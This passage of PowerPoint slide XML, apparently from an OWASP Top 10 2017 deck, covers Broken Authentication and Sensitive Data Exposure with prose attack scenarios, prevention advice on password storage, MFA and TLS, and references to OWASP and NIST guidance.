              <a:cs typeface="Arial"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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Has missing or ineffective multi-factor authentication.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRP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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900"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7"/>
              </a:rPr>
              <a:t>OWASP Proactive Controls - Implement Identity and Authentication Controls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1"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8"/>
              </a:rPr>
              <a:t>OWASP ASVS - V2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:hlinkClick r:id="rId8"/>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9"/>
              </a:rPr>
              <a:t>OWASP ASVS - V3 Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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10"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Identity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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12"/>
              </a:rPr>
              <a:t>OWASP Authentication Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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13"/>
              </a:rPr>
              <a:t>OWASP Credential Stuffing Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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14"/>
              </a:rPr>
              <a:t>OWASP Forgot Password Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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15"/>
              </a:rPr>
              <a:t>OWASP Password Storage Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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16"/>
              </a:rPr>
              <a:t>OWASP Session Management Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:hlinkClick r:id="rId16"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId17"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>NIST 800-63b 5.1.1 Memorized Secrets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> – for thorough, modern, evidence based advice on authentication. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>CWE-287: Improper Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>CWE-384: Session Fixation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>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pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Do not ship or deploy with any default credentials, particularly for admin users</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>Store passwords using a modern one way hash function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, such as Argon2 or PBKDF2, with sufficient work factor to prevent realistic GPU cracking attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Implement weak password checks, such as testing new or changed passwords against a list of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId22"/>
              </a:rPr>
              <a:t>top 10000 worst passwords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Align password length, complexity and rotation policies with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>NIST 800-63 B's guidelines in section 5.1.1 for Memorized Secrets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or other modern, evidence based password policies</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ensure registration, credential recovery, and API pathways are hardened against account enumeration attacks by using the same messages for all outcomes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Where possible, implement multi-factor authentication to prevent credential stuffing, brute force, automated, and stolen credential attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Log authentication failures and alert administrators when credential stuffing, brute force, other attacks are detected.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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A2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Broken Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69867667"/>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pPr>
                        <a:buNone/>
                      </a:pPr>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rgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FEFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Prevalence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0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>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rgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="10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0" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:ea typeface="OpenSymbo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1000" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Technical</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="10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0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FEFFFF"/>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Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Attackers have access to hundreds of millions of valid username and password combinations for credential stuffing, default administrative account lists, automated brute force and dictionary attack tools, and advanced GPU cracking tools.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>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atin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>The prevalence of broken authentication is widespread due to the design and implementation of most identity and access management systems.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>Attackers can detect broken authentication using manual means, but are often attracted by password dumps</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:latin typeface="Arial"/>
                          <a:cs typeface="Arial"/>
                        </a:rPr>
                        <a:t>, or after a social engineering attack such as phishing or similar. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>
                        <a:cs typeface="Arial"/>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buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                        </a:rPr>
                        <a:t>Attackers only have to gain access to a few accounts, or just one admin  account to compromise the system. Depending on the domain of the app, this may allow money laundering social security fraud and identity theft; or disclose legally protected highly sensitive information.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-DE" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial"/>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70214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Example Attack Scenarios</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#1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:  An application encrypts credit card numbers in a database using automatic database encryption. However, this data is automatically decrypted when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. </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#2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: A site doesn't use or enforce TLS for all pages, or if it supports weak encryption. An attacker simply monitors network traffic, strips or intercepts the TLS (like an open wireless network), and steals the user's session cookie.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The attacker then replays this cookie and hijacks the user's (authenticated) session, accessing or modifying the user's private data. Instead of the above he could alter all transported data, e.g. the recipient of a money transfer.</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#3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: The password database uses unsalted hashes to store everyone's passwords. A file upload flaw allows an attacker to retrieve the password database. All the unsalted hashes can be exposed with a rainbow table of pre-calculated hashes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRP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Data Exposure?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The first thing is to determine the protection needs of data in transit and at rest. For example, passwords, credit card numbers, health records, and personal information require extra protection, particularly if that data falls under the EU's General Data Protection Regulation (GDPR), local privacy laws or regulations, financial data protection regulations and laws, such as PCI Data Security Standard (PCI DSS), or health records laws, such as Portability Act (HIIPA). For all such data:</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Is any data of a site transmitted in clear text, internally or externally? Internet traffic is especially dangerous, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>but from load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>balancers to web servers or from web servers to back end systems can be problematic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"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Is sensitive data stored in clear text, including backups?</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Are any old or weak cryptographic algorithms used either by default or in older code? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(see A6:2017 Security Misconfiguration)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Are default crypto keys in use, weak crypto keys generated or re-used, or is proper key management or rotation missing?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Is encryption not enforced, e.g. are any user agent (browser) security directives or headers missing?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>ASVS areas Crypto (V7), Data Prot (V9) and SSL/TLS (V10)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
